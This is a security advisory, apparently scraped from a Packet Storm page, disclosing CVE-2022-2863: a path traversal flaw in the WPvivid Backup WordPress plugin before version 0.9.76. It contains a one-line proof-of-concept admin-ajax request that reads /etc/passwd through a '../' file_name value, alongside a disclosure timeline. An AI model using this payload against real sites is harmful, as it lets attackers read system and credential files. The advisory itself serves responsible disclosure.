WHAT ARE YOU LOOKING FOR?

Popular Tags

WordPress WPvivid Backup Path Traversal ≈ Packet Storm

Exploits Affichages : 379
WordPress WPvivid Backup Path Traversal ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

WordPress WPvivid Backup Path Traversal[6]
Authored by Rodolfo Tavares[7] | Site tempest.com.br[8]

WordPress WPvivid Backup plugin versions prior to 0.9.76 suffer from a path traversal vulnerability.

advisories | CVE-2022-2863[9]
SHA-256 | fb090fe06b8107185b5b73bdfac52e984a5bd3987e4e8a14397734095d06addf
Download[10] | Favorite[11] | View[12]

Change Mirror[13] Download[14]

        =====[ Tempest Security Intelligence - ADV-15/2022
]==========================
Wordpress plugin - WPvivid Backup - Version < 0.9.76
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Vulnerability
Information]=============================================
* Class: Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')
('Path Traversal') [CWE-22]
* CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
* CVSS Base Score 7.2
=====[ Overview]========================================================
* System affected : Wordpress plugin - WPvivid Backup
* Software Version : Version < 0.9.76
* Impacts : The plugin WPvivid Backup does not sanitise and validate a
parameter before using it to read the content of a file, allowing high
privilege users to read any file from the web server via a Traversal attack.
=====[ Detailed
description]=================================================
* Steps to reproduce
1 - Authenticated as privilege user, copy the request below, change the
placeholder {{nonce}} with a valid nonce:
```
https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922
```
=====[ Timeline of
disclosure]===============================================
11/Aug/2022 - Responsible disclosure was initiated with the vendor.
15/Aug/2022 - WPvivid Support confirmed the issue.
16/Aug/2022 - WPvivid Support fix the issue.
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.
=====[ Thanks & Acknowledgements]========================================
* Tempest Security Intelligence [5]
=====[ References ]=====================================================
[1][ [
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html
]]
[2][ [
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]
[4][ [
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]
]
[5][ [Thanks FXO,ACPM,MFPP]]
=====[ EOF ]===========================================================
--

Login[15] or Register[16] to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month[109]
News Tags[110]
Files by Month[111]
File Tags[112]
File Directory[113]
About Us
History & Purpose[114]
Contact Information[115]
Terms of Service[116]
Privacy Statement[117]
Copyright Information[118]
Hosting By
Rokasec[119]
close
Image
Back To Top

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"

Category

Popular Sections

About